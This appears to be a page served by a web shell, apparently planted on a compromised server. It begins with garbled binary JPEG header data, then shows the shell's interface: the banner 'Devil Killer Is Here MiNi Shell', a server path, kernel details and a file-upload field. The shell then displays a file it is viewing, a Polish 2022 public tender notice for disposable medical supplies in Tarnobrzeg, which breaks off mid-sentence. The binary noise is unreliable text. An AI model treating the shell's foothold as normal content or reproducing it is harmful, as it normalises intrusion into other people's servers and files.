JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220916/0035099901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu jednorazowego użytku do<br/>SPZOZ Zakładu Pielęgnacyjno – Opiekuńczego<br/>w Tarnobrzegu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SPZOZ Zakład Pielęgnacyjno-Opiekuńczy w Tarnobrzegu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SPZOZ Zakład Pielęgnacyjno-Opiekuńczy w Tarnobrzegu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 831216550</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dekutowskiego 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tarnobrzeg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro.zpo@interia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zpotarnobrzeg.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu jednorazowego użytku do<br/>SPZOZ Zakładu Pielęgnacyjno – Opiekuńczego<br/>w Tarnobrzegu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-462a6e2d-358d-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00350999</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00064655/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa sprzętu jednorazowego użytku do SPZOZ Zakładu Pielęgnacyjno-Opiekuńczego w Tarnobrzegu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://zpotarnobrzeg.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://zpotarnobrzeg.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>b) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji.<br/>c) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>d) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>e) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji<br/>przyjmuje się datę ich przekazania na ePUAP.<br/>f) Zamawiający przekazuje link do postępowania oraz ID postępowania na stronie internetowej http://zpotarnobrzeg.pl dla prowadzonego postępowania. Dane postępowanie można<br/>wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję<br/>„Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>3<br/>Oznaczenie postępowania: RZ271.1.3.2022<br/>2) Sposób komunikowania się Zamawiającego z Wykonawcami - nie dotyczy składania<br/>ofert i wniosków<br/>a) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż wskazanych w pkt<br/>1) b), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: Formularz do komunikacji, dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania -<br/>RZ271.1.3.2022. ).<br/>b) Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail: biuro.zpo@interia.pl<br/>c) Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza<br/>do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt b) adres<br/>email. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>3) Pozostałe informacje<br/>a) Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>b) Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2<br/>dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści<br/>SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania<br/>ofert.<br/>c) Jeżeli zamawiający nie udzieli wyjaśnień w terminach, o których mowa w pkt 2, przedłuża<br/>termin składania ofert o czas niezbędny do zapoznania się wszystkich zainteresowanych<br/>wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia ofert.<br/>d) W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie , o którym mowa w pkt 3)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja<br/>2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>a) administratorem Pani/Pana danych osobowych jest SPZOZ Zakład Pielęgnacyjno –<br/>Opiekuńczy w Tarnobrzegu, ul. Dekutowskiego 20, 39 – 400 Tarnobrzeg, z którym<br/>można kontaktować się pisemnie na adres siedziby lub poprzez adres e-mail:<br/>biuro.zpo@interia.pl lub telefonicznie pod nr 15 822 73 55.<br/>b) administrator wyznaczył Inspektora Danych Osobowych, z którym można się<br/>kontaktować pod adresem e-mail: biuro.zpo@interia.pl.<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp. przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp.,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>h) posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności<br/>podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu<br/>albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego<br/>załączników);<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia<br/>publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo<br/>do ograniczenia przetwarzania nie ma zastosowania odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego);<br/>15<br/>Oznaczenie postępowania: RZ271.1.3.2022<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>i) nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO;<br/>5) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZ271.1.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu jednorazowego użytku do SPZOZ Zakładu<br/>Pielęgnacyjno – Opiekuńczego w Tarnobrzegu.<br/>2) Kod CPV: 33100000-1 Urządzenia medyczne<br/>33140000-3 Materiały medyczne<br/>33198000-4 Szpitalne wyroby papierowe<br/>33741000-6 Produkty do pielęgnacji rąk<br/>24455000-8 Środki odkażające<br/>18100000-0 Odzież branżowa, specjalna odzież robocza i dodatki<br/>18424300-0 Rękawice jednorazowe<br/>3) Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 2 do SWZ – Formularz<br/>asortymentowo-cenowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33140000-3 - Materiały medyczne</p> <p class="mb-0">33198000-4 - Szpitalne wyroby papierowe</p> <p class="mb-0">33741000-6 - Produkty do pielęgnacji rąk</p> <p class="mb-0">24455000-8 - Środki odkażające</p> <p class="mb-0">18100000-0 - Odzież branżowa, specjalna odzież robocza i dodatki</p> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu<br/>a) Do oferty każdy Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu – zgodnie<br/>z Załącznikiem nr 3 do SWZ, Zasady składania oświadczenia zostały określone w pkt 7 i<br/>17.<br/>b) Oświadczenie , o którym mowa w pkt a), stanowi dowód potwierdzający brak podstaw<br/>wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>c) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o<br/>którym mowa w pkt a), składa każdy z Wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>d) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt a),<br/>także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) Zamawiający żąda podmiotowych środków dowodowych na potwierdzenie braku<br/>podstaw wykluczenia.<br/>a) Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych, o których mowa w pkt.<br/>b), z zastrzeżeniem pkt c).<br/>b) W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu<br/>o udzielenie zamówienia publicznego, zgodnie z zasadami określonymi w pkt a)<br/>Zamawiający żąda:<br/>aa)odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>c) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli: może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności<br/>rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w<br/>oświadczeniu , o którym mowa w pkt 1)a) dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane wraz z ofertą:<br/>a) Ofertę należy sporządzić zgodnie z wzorem Formularza ofertowego stanowiącym Załącznik<br/>nr 1 do SWZ.<br/>Do oferty należy załączyć:<br/>a) Wypełniony i podpisany Formularz Oferty – załącznik nr 1 do SWZ.<br/>b) Wypełniony i podpisany Formularz asortymentowo-cenowy – załącznik nr 2 do SWZ.<br/>c) Wypełnione i podpisane Oświadczenie Wykonawcy o niepodleganiu wykluczeniu – załącznik nr 3 do SWZ.<br/>d) Pełnomocnictwo w przypadku gdy osoba lub osoby podpisujące ofertę działają na podstawie pełnomocnictwa i/lub pełnomocnictwo do reprezentowania Wykonawcy/Wykonawców<br/>w postępowaniu o udzielenie zamówienia. Forma pełnomocnictwa została określona w pkt<br/>IX.6 niniejszej części.<br/>e) Zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji przedmiotowego zamówienia – jeżeli dotyczy.<br/>3) Termin składania ofert:<br/>a) Oferty winny być złożone w terminie do dnia 28.09.2022 r. do godz. 12:00.<br/>b) Zamawiający odrzuca ofertę, jeżeli została złożona po terminie składania ofert. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Forma prawna Wykonawcy, w przypadku składania oferty wspólnej:<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 58 ust.<br/>2 Ustawy.<br/>3. Pełnomocnikiem może być jeden z Wykonawców działających wspólnie lub osoba trzecia<br/>(np. pracownik jednego z Wykonawców);<br/>4. Jeżeli pełnomocnikiem pozostałych Wykonawców jest Wykonawca będący osobą prawną<br/>to może on działać zgodnie z ujawnionymi w dokumentach rejestrowych zasadami<br/>reprezentacji;<br/>5. Pełnomocnictwo, o którym mowa powyżej, powinno być w formie elektronicznej opatrzonej<br/>podpisem kwalifikowanym osób upoważnionych do reprezentowania Wykonawców oraz<br/>zostać przekazane w ofercie wspólnej Wykonawców.<br/>6. Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie z Zamawiającym w toku<br/>postępowania i do niego Zamawiający kieruje informacje, korespondencję itp. Wszelkie<br/>oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wszystkich Wykonawców<br/>składających ofertę 